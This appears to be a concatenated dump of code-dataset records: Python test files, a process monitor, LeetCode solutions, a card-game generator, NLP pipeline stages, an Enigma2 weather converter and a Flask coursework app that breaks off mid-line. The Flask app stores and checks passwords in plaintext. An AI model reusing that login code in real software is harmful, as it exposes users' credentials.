parse_version(\"v1.0.0\") == semver.VersionInfo(1, 0, 0)\n\n\ndef test_match_version_returns_correct_value():\n \"\"\"Test limits of matching version\"\"\"\n version_set = (\"0.0.0\", \"0.0.1\", \"1.0.0\", \"1.0.1\", \"1.1.0\", \"2.0.0\")\n assert match_version(\"alias\", version_set) is None\n assert match_version(\"\", version_set) is None\n assert match_version(\"3\", version_set) is None\n assert match_version(\"2\", version_set) == semver.VersionInfo.parse(\"2.0.0\")\n assert match_version(\"1\", version_set) == semver.VersionInfo.parse(\"1.1.0\")\n assert match_version(\"1.0\", version_set) == semver.VersionInfo.parse(\"1.0.1\")\n assert match_version(\"0\", version_set) == semver.VersionInfo.parse(\"0.0.1\")\n","sub_path":"src/nvshim/core/tests/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":8661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"148033318","text":"#encoding=utf-8\nimport psutil\nimport time\nimport sys\nimport os\n \n\"\"\"\n这个脚本用于监控某个进程的CPU和内存使用情况,将信息记录到文件中\n\"\"\"\n \nif __name__ == '__main__':\n \"\"\"参数1:进程PID 参数2:保存的文件名(可选) 参数3:时间间隔(可选) \n \"\"\"\n pid = sys.argv[1]\n file_name = sys.argv[2] if len(sys.argv) > 2 else 'Test.txt'\n interval = float(sys.argv[3]) if len(sys.argv) > 3 else 10\n p = psutil.Process(int(pid))\n try:\n\n while True:\n f = open(file_name, 'a')\n f.write('time: %s\\tcpu percent: %f\\tmemory usage:%d\\n' % (time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time())),\n p.cpu_percent(interval=1.0),\n p.memory_info()[0]))\n print (p.name())\n print (os.path.basename('./../jre/jre/bin/java -Xbootclasspath/a:./../lib/boot.jar -classpath ./../lib/bootstrap.jar:./../lib/extensions.jar:./../lib/util.jar:./../l'))\n f.close()\n # 每一段时间记录一次进程的CPU和内存使用信息\n time.sleep(interval)\n except KeyboardInterrupt:\n # 中断退出\n print ('Exit!')\n finally:\n f.close()\n","sub_path":"testcpu.py","file_name":"testcpu.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"476553701","text":"\"\"\"\n350. Intersection of Two Arrays II\n\n\nGiven two arrays, write a function to compute their intersection.\n\nExample 1:\n\nInput: nums1 = [1,2,2,1], nums2 = [2,2]\nOutput: [2,2]\nExample 2:\n\nInput: nums1 = [4,9,5], nums2 = [9,4,9,8,4]\nOutput: [4,9]\nNote:\n\nEach element in the result should appear as many times as it shows in both arrays.\nThe result can be in any order.\nFollow up:\n\nWhat if the given array is already sorted? How would you optimize your algorithm?\nWhat if nums1's size is small compared to nums2's size? Which algorithm is better?\nWhat if elements of nums2 are stored on disk, and the memory is limited such that you cannot load all elements into the memory at once?\n\n\"\"\"\n\n\"\"\"\nfollow up\n\nIf only nums2 cannot fit in memory, put all elements of nums1 into a HashMap, read chunks of array that fit into the memory, and record the intersections.\n\nIf both nums1 and nums2 are so huge that neither fit into the memory, sort them individually (external sort), then read 2 elements from each array at a time in memory, record intersections.\n\n\"\"\"\n\n#hash table\n#time complexityL O(n) space complexity: O(n + m)\n\n\nclass Solution:\n def intersect(self, nums1, nums2):\n \"\"\"\n :type nums1: List[int]\n :type nums2: List[int]\n :rtype: List[int]\n \"\"\"\n hash1 = {}\n hash2 = {}\n for num in nums1:\n hash1[num] = hash1.get(num, 0) + 1\n for num in nums2:\n hash2[num] = hash2.get(num, 0) + 1\n res = []\n for num in hash1:\n if num in hash2:\n res.extend([num] * min(hash1[num], hash2[num]))\n\n return res\n\n#two pointers also works\n\n#2020/03/30\n#Runtime: 44 ms, faster than 80.99% of Python3 online submissions for Intersection of Two Arrays II.\n#Memory Usage: 14.1 MB, less than 5.72% of Python3 online submissions for Intersection of Two Arrays II.\n\nclass Solution:\n def intersect(self, nums1: List[int], nums2: List[int]) -> List[int]:\n res = []\n nums1.sort()\n nums2.sort()\n i1, i2 = 0, 0\n while i1 < len(nums1) and i2 < len(nums2):\n if nums1[i1] < nums2[i2]:\n i1 += 1\n elif nums1[i1] > nums2[i2]:\n i2 += 1\n else:\n res.append(nums1[i1])\n i1 += 1; i2 += 1\n return res\n\n# 2021/09/17\n# Runtime: 57 ms, faster than 40.56% of Python3 online submissions for Intersection of Two Arrays II.\n# Memory Usage: 14.4 MB, less than 69.86% of Python3 online submissions for Intersection of Two Arrays II.\n\n# 经典哈希表。将频数的最小值记录下来。\n\nclass Solution:\n def intersect(self, nums1: List[int], nums2: List[int]) -> List[int]:\n counts1, counts2 = {}, {}\n for num in nums1:\n counts1[num] = counts1.get(num, 0) + 1\n for num in nums2:\n counts2[num] = counts2.get(num, 0) + 1\n ans = []\n for num in counts1:\n if num in counts2:\n ans += [num] * min(counts1[num], counts2[num])\n return ans","sub_path":"0350. Intersection of Two Arrays II.py","file_name":"0350. Intersection of Two Arrays II.py","file_ext":"py","file_size_in_byte":3042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"257945921","text":"import json\nfrom random import shuffle,choice\nfrom scenario import Scenario\nfrom professions import Professions\nfrom health import Health\nfrom bio_characteristic import BIO\nfrom additional_info import AInfo\nfrom personality_traits import PTrains\nfrom hobbies import Hobbies\nfrom phobias import Phobias\nfrom special_info import SInfo\n\nclass Game:\n def __init__(self,player_number):\n self.__player_number = player_number\n # def classes objects\n self.__scenario_obj = Scenario()\n self.__professions_obj = Professions()\n self.__health_obj = Health()\n self.__bio_characteristic_obj = BIO()\n self.__additional_info_obj = AInfo()\n self.__personality_trains_obj = PTrains()\n self.__hobbies_obj = Hobbies()\n self.__phobias_obj = Phobias()\n self.__special_info_obj = SInfo()\n\n self.__load_data()\n self.__shuffle_data()\n self.__create_players()\n self.__make_players_files()\n\n def __load_data(self):\n print(\"Loading scenarios...\")\n self.__scenario = self.__scenario_obj.get_scenarios()\n print(\"Loading scenarios - completed!\")\n\n print(\"Loading professions...\")\n self.__professions = self.__professions_obj.get_professions()\n print(\"Loading professions - completed!\")\n\n print(\"Loading diseases (health)...\")\n self.__diseases = self.__health_obj.get_diseases()\n print(\"Loading diseases (health) - completed!\")\n\n print(\"Loading bio. characteristics...\")\n self.__bio_characteristics = self.__bio_characteristic_obj.get_bio_info(self.__player_number)\n print(\"Loading bio. characteristics - completed!\")\n\n print(\"Loading additional information...\")\n self.__additional_info = self.__additional_info_obj.get_additional_info()\n print(\"Loading additional information - completed!\")\n\n print(\"Loading personality trains...\")\n self.__personality_trains = self.__personality_trains_obj.get_peronality_trains()\n print(\"Loading personality trains - completed!\")\n\n print(\"Loading hobbies...\")\n self.__hobbies = self.__hobbies_obj.get_hobbies()\n print(\"Loading hobbies - completed!\")\n\n print(\"Loading phobias...\")\n self.__phobias = self.__phobias_obj.get_phobias()\n print(\"Loading phobias - completed!\")\n\n print(\"Loading special information...\")\n self.__special_info = self.__special_info_obj.get_special_info()\n print(\"Loading special information - completed!\")\n def __shuffle_data(self):\n # Scenarios\n keys = list(self.__scenario.keys())\n shuffle(keys)\n self.__shuffled_scenario = dict()\n for key in keys:\n self.__shuffled_scenario.update({key:self.__scenario[key]})\n\n # Profs\n keys = list(self.__professions.keys())\n shuffle(keys)\n self.__shuffled_professions = dict()\n for key in keys:\n self.__shuffled_professions.update({key: self.__professions[key]})\n\n # Diseases\n keys = list(self.__diseases.keys())\n shuffle(keys)\n self.__shuffled_diseases = dict()\n for key in keys:\n self.__shuffled_diseases.update({key: self.__diseases[key]})\n\n # Bio\n shuffle(self.__bio_characteristics)\n self.__shuffled_bio_characteristics = self.__bio_characteristics\n\n # Additional info\n shuffle(self.__additional_info)\n self.__shuffled_additional_info = self.__additional_info\n\n # Personality traits\n shuffle(self.__personality_trains)\n self.__shuffled_personality_trains = self.__personality_trains\n\n # Hobbies\n keys = list(self.__hobbies.keys())\n shuffle(keys)\n self.__shuffled_hobbies = dict()\n for key in keys:\n self.__shuffled_hobbies.update({key: self.__hobbies[key]})\n\n # Phobias\n shuffle(self.__phobias)\n self.__shuffled_phobias = self.__phobias\n\n # Special info\n shuffle(self.__special_info)\n self.__shuffled_special_info = self.__special_info\n def __create_players(self):\n try:\n self.__players = []\n for i in range(self.__player_number):\n player = {}\n # prof\n key = choice(list(self.__shuffled_professions))\n player[\"Profession\"] = {key: self.__shuffled_professions[key]}\n del self.__shuffled_professions[key]\n # disease\n key = choice(list(self.__shuffled_diseases))\n player[\"Disease\"] = key\n del self.__shuffled_diseases[key]\n # bio\n key = choice(self.__shuffled_bio_characteristics)\n player[\"Bio.Characteristic\"] = key\n self.__shuffled_bio_characteristics.remove(key)\n # additional info\n key = choice(self.__shuffled_additional_info)\n player[\"Additional information\"] = key\n self.__shuffled_additional_info.remove(key)\n # personality traits\n key = choice(self.__shuffled_personality_trains)\n player[\"Personality trait\"] = key\n self.__shuffled_personality_trains.remove(key)\n # hobbies\n key = choice(list(self.__shuffled_hobbies))\n player[\"Hobby\"] = {key: self.__shuffled_hobbies[key]}\n del self.__shuffled_hobbies[key]\n # phobias\n key = choice(self.__shuffled_phobias)\n player[\"Phobia\"] = key\n self.__shuffled_phobias.remove(key)\n # Special information\n key = choice(self.__shuffled_special_info)\n player[\"Special information\"] = key\n self.__shuffled_special_info.remove(key)\n\n self.__players.append(player)\n except ValueError as error:\n print(\"Error \", error)\n\n def __make_players_files(self):\n for i in range(self.__player_number):\n with open(f\"players/{i}.txt\",\"w\",encoding='utf-8') as file:\n for key in self.__players[i].keys():\n if key == \"Profession\":\n prof_key = list(self.__players[i][key].keys()) # prof name\n file.write(f\"Ваша профессия - {prof_key[0]}\\n\")\n file.write(f\"Описание вашей профессии - {self.__players[i][key][prof_key[0]]}\\n\")\n if key == \"Disease\":\n disease_key = self.__players[i][key]\n file.write(f\"Ваше состояние здоровья - {disease_key}\\n\")\n if key == \"Bio.Characteristic\":\n bio_key = list(self.__players[i][key].keys())\n file.write(f\"Ваш пол - {bio_key[0]}\\n\")\n file.write(f\"Ваш возраст - {self.__players[i][key][bio_key[0]]}\\n\")\n if key == \"Additional information\":\n file.write(f\"Ваша карта с доп. информацией под номером - {self.__players[i][key]}\\n\")\n if key == \"Personality trait\":\n file.write(f\"Ваша персональная четра - {self.__players[i][key]}\\n\")\n if key == \"Hobby\":\n hobby_key = list(self.__players[i][key].keys())\n file.write(f\"Ваше хобби - {self.__players[i][key][hobby_key[0]]}(Номер хобби - {hobby_key[0]})\\n\")\n if key == \"Phobia\":\n file.write(f\"Ваша фобия - {self.__players[i][key].capitalize()}\\n\")\n if key == \"Special information\":\n file.write(f\"Ваша карта с спец. информацией под номером - {self.__players[i][key]}\\n\")\n\nif __name__ == '__main__':\n print(\"Number of players can not be lower than 6 or higher than 12, also can not be odd (7,9,11)\\n\")\n player_number = int(input(\"Enter number of players\"))\n game = Game(player_number)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"265029266","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n\nimport os\nfrom msrest.serialization import Model\n\n\nclass ApplicationTemplateInfo(Model):\n \"\"\"A reference to an Azure Batch Application Template.\n\n :param str file_path: The path to an application template file. This can\n be a full path, or relative to the current working directory. Alternatively\n a relative directory can be supplied with the 'current_directory' argument.\n A ValueError will be raised if the supplied file path cannot be found.\n :param dict parameters: A dictory of parameter names and values to be\n subtituted into the application template.\n \"\"\"\n\n _validation = {\n 'file_path': {'required': True},\n }\n\n _attribute_map = {\n 'file_path': {'key': 'filePath', 'type': 'str'},\n 'parameters': {'key': 'parameters', 'type': 'object'},\n }\n\n def __init__(self, **kwargs):\n super(ApplicationTemplateInfo, self).__init__(**kwargs)\n self.file_path = kwargs.get('file_path', None)\n if not os.path.isfile(self.file_path):\n current_directory = kwargs.get('current_directory', \".\")\n self.file_path = os.path.abspath(os.path.join(current_directory, str(self.file_path)))\n self.parameters = kwargs.get('parameters', None)\n\n # Rule: Template file must exist\n # (We do this in order to give a good diagnostic in the most common case, knowing that this is\n # technically a race condition because someone could delete the file between our check here and\n # reading the file later on. We expect such cases to be rare.)\n try:\n with open(self.file_path, 'r'):\n pass\n except EnvironmentError as error:\n raise ValueError(\"Unable to read the template '{}': {}\".format(self.file_path, error))\n","sub_path":"azext/batch/models/application_template_info.py","file_name":"application_template_info.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"74800027","text":"import json\nimport os\nimport re\nimport threading\nfrom collections import defaultdict\nfrom io import BytesIO\nfrom itertools import count as iter_count\nfrom bson import ObjectId\nimport jieba\nimport numpy as np\nimport openpyxl\nfrom models import Paragraph\nfrom opencc import OpenCC\nfrom openpyxl.cell.cell import ILLEGAL_CHARACTERS_RE\nfrom pipeline import *\nfrom PyMongoWrapper.dbo import DbObject\n\n\nclass Passthrough(PipelineStage):\n \"\"\"直接通过\n \"\"\"\n\n def resolve(self, p : Paragraph) -> Paragraph:\n return p\n\n\nclass TradToSimpChinese(PipelineStage):\n \"\"\"繁体中文转为简体中文\n \"\"\"\n\n t2s = OpenCC('t2s')\n\n def resolve(self, p: Paragraph) -> Paragraph:\n p.content = TradToSimpChinese.t2s.convert(p.content)\n if p.lang == 'cht': p.lang = 'chs'\n return p\n\n\nclass JiebaCut(PipelineStage):\n \"\"\"使用结巴分词生成检索词\n \"\"\"\n\n def __init__(self, for_search=False, **kwargs):\n \"\"\"\n Args:\n for_search (bool): 是否用于搜索(会产生冗余分词结果)\n \"\"\"\n self.for_search = for_search\n\n def resolve(self, p: Paragraph) -> Paragraph:\n p.tokens = list(jieba.cut_for_search(p.content) if self.for_search else jieba.cut(p.content))\n return p\n\n\nclass WesternCut(PipelineStage):\n \"\"\"西文分词\n \"\"\"\n \n def resolve(self, p: Paragraph) -> Paragraph:\n p.tokens = [_.lower() for _ in re.split(r'[^\\w]', p.content)]\n return p\n\n\nclass KeywordsFromTokens(PipelineStage):\n \"\"\"将词袋中的分词结果加入到检索词中并删除词袋\n \"\"\"\n \n def resolve(self, p: Paragraph) -> Paragraph:\n for w in set(p.tokens):\n p.keywords.append(w)\n delattr(p, 'tokens')\n p.save()\n return p\n\n\nclass FilterPunctuations(PipelineStage):\n \"\"\"过滤标点符号\n \"\"\"\n \n re_punctuations = re.compile(r'[,。「」·;□■•●『』[]【】()\\s\\(\\)、“”‘’《》——\\-!?\\.\\?\\!\\,\\'\\\":\\/\\\\\\n\\u3000…]')\n\n def resolve(self, p: Paragraph) -> Paragraph:\n p.content = FilterPunctuations.re_punctuations.sub('', p.content)\n return p\n\n\nclass AccumulateParagraphs(PipelineStage):\n \"\"\"将遍历的段落保存起来以备下一步骤使用(通常用于导出)\n \"\"\"\n\n def __init__(self):\n self.paragraphs = []\n self._lock = threading.Lock()\n\n def resolve(self, p : Paragraph):\n with self._lock:\n self.paragraphs.append(p)\n\n def summarize(self, *args):\n return self.paragraphs\n\n\nclass Export(PipelineStage):\n \"\"\"结果导出为文件\n \"\"\"\n\n re_excel_illegal_chars = re.compile(ILLEGAL_CHARACTERS_RE)\n\n def __init__(self, format='xlsx', limit=0) -> None:\n \"\"\"导出结果\n\n Args:\n format (xlsx|json|csv): 输出格式。\n limit (int, optional): 最多导出的记录数量,0表示无限制。\n \"\"\"\n self.format = format\n self.limit = limit\n\n def summarize(self, r):\n\n def json_dump(v):\n try:\n return json.dump(v)\n except:\n return str(v)\n\n def _value_for_excel(x):\n if isinstance(x, str):\n x = Export.re_excel_illegal_chars.sub('', x)\n if x.startswith('='):\n x = \"'\" + x\n elif isinstance(x, ObjectId):\n return str(x)\n elif x is None or isinstance(x, (int, float)):\n pass\n elif isinstance(x, list):\n x = ','.join([str(_value_for_excel(_)) for _ in x])\n else:\n x = json_dump(x)\n return x\n\n def _value_for_csv(x):\n if x is None:\n return \"\"\n elif isinstance(x, ObjectId):\n return str(x)\n elif isinstance(x, (int, float)):\n return str(x)\n if not isinstance(x, str): x = str(x)\n if ',' in x:\n x = x.replace('\"', '\"\"')\n x = '\"' + x + '\"'\n return x.replace('\\n', '')\n \n def _get_header_and_records(r):\n if isinstance(r, dict):\n return [], r.items()\n else:\n r = list(r)\n if not r:\n return [], []\n if isinstance(r[0], DbObject):\n r = [_.as_dict() for _ in r]\n if isinstance(r[0], dict):\n h = list(r[0].keys())\n if 'keywords' in h: h.remove('keywords')\n if '_id' in h: h.remove('_id')\n r = [[_.get(k) for k in h] for _ in r]\n else:\n h = []\n return h, r\n\n if self.format == 'json':\n return {\n '__file_ext__': 'json',\n 'data': BytesIO(json_dump(r).encode('utf-8'))\n }\n \n elif self.format == 'csv':\n h, r = _get_header_and_records(r)\n if h: r.insert(0, h)\n\n s = ''\n for l in r:\n s += ','.join([_value_for_csv(_) for _ in l]) + '\\n'\n return {\n '__file_ext__': 'csv',\n 'data': BytesIO(s.encode('utf-8'))\n }\n\n elif self.format == 'xlsx':\n h, r = _get_header_and_records(r)\n\n wb = openpyxl.Workbook()\n ws = wb.active\n\n if h:\n ws.append(h)\n for l in r:\n ws.append([_value_for_excel(_) for _ in l])\n\n buf = BytesIO()\n wb.save(buf)\n return {\n '__file_ext__': 'xlsx',\n 'data': buf.getvalue()\n }\n\n\nclass AutoSummary(PipelineStage):\n \"\"\"中文自动摘要\n \"\"\"\n def __init__(self, count) -> None:\n \"\"\"\n Args:\n count (int): 摘要中的句子数量\n \"\"\"\n self.count = count\n\n def resolve(self, p: Paragraph) -> Paragraph:\n from textrank4zh import TextRank4Keyword, TextRank4Sentence\n tr4s = TextRank4Sentence()\n tr4s.analyze(text=p.content, lower=True, source='all_filters')\n p.summary = '\\n'.join([\n item.sentence\n for item in tr4s.get_key_sentences(num=self.count)\n ])\n return p\n\n\nclass Counter:\n\n class _CounterNum:\n\n def __init__(self):\n self._number_of_read = 0\n self._counter = iter_count()\n \n def value(self):\n value = next(self._counter) - self._number_of_read\n self._number_of_read += 1\n return value\n\n def inc(self, d=1):\n for i in range(d):\n next(self._counter)\n\n def __init__(self) -> None:\n self._d = defaultdict(Counter._CounterNum)\n\n def __getitem__(self, key):\n return self._d[key]\n\n def as_dict(self):\n return {\n k: v.value() for k, v in self._d.items()\n }\n\n\nclass NgramCounter(PipelineStage):\n \"\"\"N-Gram 计数\n \"\"\"\n\n def __init__(self, n : int, lr=False):\n \"\"\" N-Gram\n\n Args:\n n (int): 最大字串长度\n lr (bool): 是否同时记录左右字符计数\n \"\"\"\n if lr: n += 2\n self.n = n\n self.lr = lr\n self.ngrams = Counter()\n self.ngrams_lefts = defaultdict(Counter)\n self.ngrams_rights = defaultdict(Counter)\n \n def resolve(self, p : Paragraph) -> Paragraph:\n ngrams = [' ' * i for i in range(self.n)]\n for c in p.content:\n for i in range(self.n):\n ngrams[i] = (ngrams[i] + c)[-i-1:]\n self.ngrams[ngrams[i]].inc()\n if self.lr:\n for i in range(2, self.n):\n left, word, right = ngrams[i][0], ngrams[i][1:-1], ngrams[i][-1]\n self.ngrams_lefts[word][left].inc()\n self.ngrams_rights[word][right].inc()\n\n def summarize(self, returned):\n self.ngrams = self.ngrams.as_dict()\n self.ngrams_lefts = {k: v.as_dict() for k, v in self.ngrams_lefts.items()}\n self.ngrams_rights = {k: v.as_dict() for k, v in self.ngrams_rights.items()}\n","sub_path":"pipelines/basics.py","file_name":"basics.py","file_ext":"py","file_size_in_byte":8236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"140677441","text":"# RWeather Converter\n# xml from rambler weather\n# Copyright (c) 2boom 2014 (10.09.2014)\n# v.0.2-r0\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n# %S - city, %T - temp, %C - condition, %W - windspeed, %H- humiditydata\n\nfrom Tools.Directories import fileExists, pathExists\nfrom Components.Converter.Converter import Converter\nfrom Components.Element import cached\nfrom Components.Console import Console as iConsole\nfrom Components.Language import language\nfrom os import environ\nfrom Poll import Poll\nimport gettext\nimport time\nimport os\n\ntime_update = 20\ntime_update_ms = 3000\n\nclass RWeather(Poll, Converter, object):\n\tcity = 0\n\ttemp = 1\n\tcondition = 2\n\twindtxt = 3\n\twindspeed = 4\n\thumiditytxt = 5\n\thumiditydata = 6\n\tpicon = 7\n\tallinfo = 8\n\tformat = 9\n\n\tdef __init__(self, type):\n\t\tConverter.__init__(self, type)\n\t\tPoll.__init__(self)\n\t\tif type == \"city\":\n\t\t\tself.type = self.city\n\t\telif type == \"temp\":\n\t\t\tself.type = self.temp\n\t\telif type == \"condition\":\n\t\t\tself.type = self.condition\n\t\telif type == \"windtxt\":\n\t\t\tself.type = self.windtxt\n\t\telif type == \"windspeed\":\n\t\t\tself.type = self.windspeed\n\t\telif type == \"humiditytxt\":\n\t\t\tself.type = self.humiditytxt\n\t\telif type == \"humiditydata\":\n\t\t\tself.type = self.humiditydata\n\t\telif type == \"picon\":\n\t\t\tself.type = self.picon\n\t\telif type.startswith('Format:'):\n\t\t\tself.type = self.format\n\t\t\tself.paramert_str = type \n\t\telse:\n\t\t\tself.type = self.allinfo\n\t\tself.iConsole = iConsole()\n\t\tself.poll_interval = time_update_ms\n\t\tself.poll_enabled = True\n\n\tdef write_none(self):\n\t\twith open('/tmp/rweather.xml', 'w') as noneweather:\n\t\t\tnoneweather.write('None')\n\t\tnoneweather.close()\n\n\tdef get_xmlfile(self):\n\t\tself.iConsole.ePopen(\"wget -P /tmp -T2 'http://informers.rambler.ru/weather/geoid//?version=4' -O /tmp/rweather.xml\", self.control_xml)\n\t\n\tdef control_xml(self, result, retval, extra_args):\n\t\tif retval is not 0:\n\t\t\tself.write_none()\n\n\t@cached\n\tdef getText(self):\n\t\tinfo = weather_str = 'NA'\n\t\trweather = {'city':'', 'temp':'', 'condition':'', 'windtxt':'', 'windspeed':'',\\\n\t\t\t'humiditytxt':'', 'humiditydata':'', 'picon':'', 'allinfo':''}\n\t\tif fileExists(\"/tmp/rweather.xml\"):\n\t\t\tif int((time.time() - os.stat('/tmp/rweather.xml').st_mtime)/60) >= time_update:\n\t\t\t\tself.get_xmlfile()\n\t\telse:\n\t\t\tself.get_xmlfile()\n\t\tif not fileExists('/tmp/rweather.xml'):\n\t\t\tself.write_none()\n\t\t\treturn info\n\t\tif fileExists('/tmp/rweather.xml') and open('/tmp/rweather.xml').read() is 'None':\n\t\t\treturn info\n\t\tif fileExists('/tmp/rweather.xml'):\n\t\t\tin_file = open('/tmp/rweather.xml').read().replace('\\n', ', ').split('>')\n\t\t\tif len(in_file) is 7:\n\t\t\t\trweather['picon'] = in_file[1].split('/')[-1].split('.')[0]\n\t\t\t\tweather_str = in_file[3].split('[')[-1].strip(']').split()\n\t\t\t\tweather_data = in_file[3].split('[')[-1].strip(']').split(',')\n\t\t\t\tfor i in range(3, len(weather_data[0].split())):\n\t\t\t\t\trweather['city'] += weather_data[0].split()[i] + ' '\n\t\t\t\trweather['city'] = rweather['city'].strip()\n\t\t\t\trweather['temp'] = '%s%sC' % (weather_data[-3].split()[0][:-3],unichr(176).encode(\"latin-1\"))\n\t\t\t\tfor i in range(1, len(weather_data[-3].split())):\n\t\t\t\t\trweather['condition'] += weather_data[-3].split()[i].strip(',') + ' '\n\t\t\t\trweather['condition'] = rweather['condition'].strip()\n\t\t\t\trweather['windtxt'] = weather_data[-2].split()[0]\n\t\t\t\trweather['windspeed'] = '%s, %s %s' % (weather_data[-2].split()[-1], weather_data[-2].split()[-3], weather_data[-2].split()[-2])\n\t\t\t\trweather['humiditytxt'] = weather_data[-1].split()[-2]\n\t\t\t\trweather['humiditydata'] = weather_data[-1].split()[-1]\n\t\t\t\tfor i in range(3,len(weather_str)):\n\t\t\t\t\trweather['allinfo'] += weather_str[i] + ' '\n\t\t\t\trweather['allinfo'] = rweather['allinfo'].strip()\n\t\tif self.type is self.city:\n\t\t\tinfo = rweather['city']\n\t\tif self.type is self.temp:\n\t\t\tinfo = rweather['temp']\n\t\tif self.type is self.condition:\n\t\t\tinfo = rweather['condition']\n\t\tif self.type is self.windtxt:\n\t\t\tinfo = rweather['windtxt']\n\t\tif self.type is self.windspeed:\n\t\t\tinfo = rweather['windspeed']\n\t\tif self.type is self.humiditytxt:\n\t\t\tinfo = rweather['humiditytxt']\n\t\tif self.type is self.humiditydata:\n\t\t\tinfo = rweather['humiditydata']\n\t\tif self.type is self.picon:\n\t\t\tinfo = rweather['picon']\n\t\tif self.type is self.allinfo:\n\t\t\tinfo = rweather['allinfo']\n\t\tif self.type is self.format:\n\t\t\t# %S - city, %T - temp, %C - condition, %W - windspeed, %H- humiditydata\n\t\t\treturn self.paramert_str.replace('Format:', '').replace('%S', rweather['city']).replace('%T', rweather['temp']).replace('%C', rweather['condition'])\\\n\t\t\t\t.replace('%W', rweather['windspeed']).replace('%H', rweather['humiditydata'])\n\t\treturn info\n\ttext = property(getText)\n\n\tdef changed(self, what):\n\t\tConverter.changed(self, (self.CHANGED_POLL,))\n","sub_path":"usr/lib/enigma2/python/Plugins/Extensions/SetupNeutronHD/components/RWeather.py","file_name":"RWeather.py","file_ext":"py","file_size_in_byte":5287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"114749581","text":"from flask import render_template, flash, redirect, session, url_for, request, g, jsonify\nfrom flask_login import login_user, logout_user, current_user, login_required\nfrom app import app, login_manager, db\nfrom forms import LoginForm, SignupForm\nfrom models import User, UserAssignments, Assignment, AssignmentTest\nfrom testcode import get_test_str, check_test_results\nfrom emails import send_email_users_new_asgn, send_email_admin_late_soln\nfrom config import SECRET_KEY\nimport datetime\n\n\n@app.before_request\ndef before_request():\n \"\"\"\n Better access to current_user.\n \"\"\"\n g.user = current_user\n\n\n@app.route('/')\n@app.route('/index')\ndef index():\n return render_template(\"partials/home.html\")\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n if g.user is not None and g.user.is_authenticated:\n return redirect(url_for('index'))\n login_form = LoginForm()\n signup_form = SignupForm()\n if login_form.validate_on_submit():\n user = User.query.filter_by(username=login_form.username.data).first()\n if user:\n # TODO: make password check more secure\n if user.password == login_form.password.data:\n login_user(user, remember=login_form.remember_me.data)\n return redirect(request.args.get('next') or url_for('index'))\n flash('Invalid username or password. Try again.')\n return redirect(url_for('login'))\n return render_template(\"partials/login.html\",\n login_form=login_form,\n signup_form=signup_form)\n\n\n@app.route('/signup', methods=['POST'])\ndef signup():\n signup_form = SignupForm()\n if signup_form.validate_on_submit():\n if User.query.filter_by(username=signup_form.username.data).first() \\\n or User.query.filter_by(email=signup_form.email.data).first():\n flash('Username or email already taken. Try again.')\n return redirect(url_for('login'))\n user = User(\n username=signup_form.username.data,\n email=signup_form.email.data,\n password=signup_form.password.data\n )\n db.session.add(user)\n db.session.commit()\n login_user(user, remember=signup_form.remember_me.data)\n return redirect(request.args.get('next') or url_for('index'))\n return redirect(url_for('login'))\n\n\n@login_manager.user_loader\ndef load_user(user_id):\n return User.query.get(int(user_id))\n\n\n@app.route('/logout')\n@login_required\ndef logout():\n logout_user()\n return redirect(url_for('index'))\n\n\n@app.route('/profile')\n@login_required\ndef profile():\n solved_asgns = g.user.get_solved_assignments()\n unsolved_visible_asgns = g.user.get_unsolved_visible_assignments()\n return render_template(\"partials/profile.html\",\n user=g.user,\n solved_asgns=solved_asgns,\n unsolved_visible_asgns=unsolved_visible_asgns)\n\n\n@app.route('/resources')\ndef resources():\n return render_template(\"partials/resources.html\")\n\n\n@app.route('/editor/')\ndef editor(asgn_id):\n assignment = Assignment.query.filter(Assignment.id == asgn_id).first()\n user_soln = ''\n if g.user.has_solved(assignment):\n with open('./results/' + str(g.user.id) + '_' + str(asgn_id) + '.py', 'r') as f:\n user_soln = f.read()\n return render_template(\"partials/editor.html\",\n assignment=assignment,\n user_soln=user_soln)\n\n\n@app.route('/gettest/', methods=['POST'])\ndef gettest(asgn_id):\n \"\"\"\n Request for assignment tests when 'Submit' is hit in editor.\n \"\"\"\n assignment = Assignment.query.filter(Assignment.id == asgn_id).first()\n test_prog_str = get_test_str(assignment)\n return jsonify({'test_template': test_prog_str})\n\n\n@app.route('/testdone//', methods=['POST'])\ndef testdone(asgn_id, user_id):\n \"\"\"\n Request for test result verification once tests have been run; if successful, store user code.\n \"\"\"\n user = User.query.filter(User.id == user_id).first()\n assignment = Assignment.query.filter(Assignment.id == asgn_id).first()\n req_json = request.get_json(silent=True)\n test_results = req_json['test_result']\n code_str = req_json['program']\n has_solved = check_test_results(assignment, test_results)\n if has_solved:\n result_path = './results/' + str(user_id) + '_' + str(asgn_id) + '.py'\n with open(result_path, 'w+') as f:\n f.write(code_str)\n if assignment.due_date_passed() and not user.has_solved(assignment):\n send_email_admin_late_soln(user, assignment)\n user.solve_assignment(assignment, result_path)\n db.session.commit()\n return jsonify({'solved': has_solved})\n\n\n@app.route('/addassignment', methods=['POST'])\ndef addassignment():\n \"\"\"\n Utility view for adding assignments.\n \"\"\"\n req_json = request.get_json(silent=True)\n if not req_json:\n return \"Assignment addition failed.\"\n if req_json['key'] != 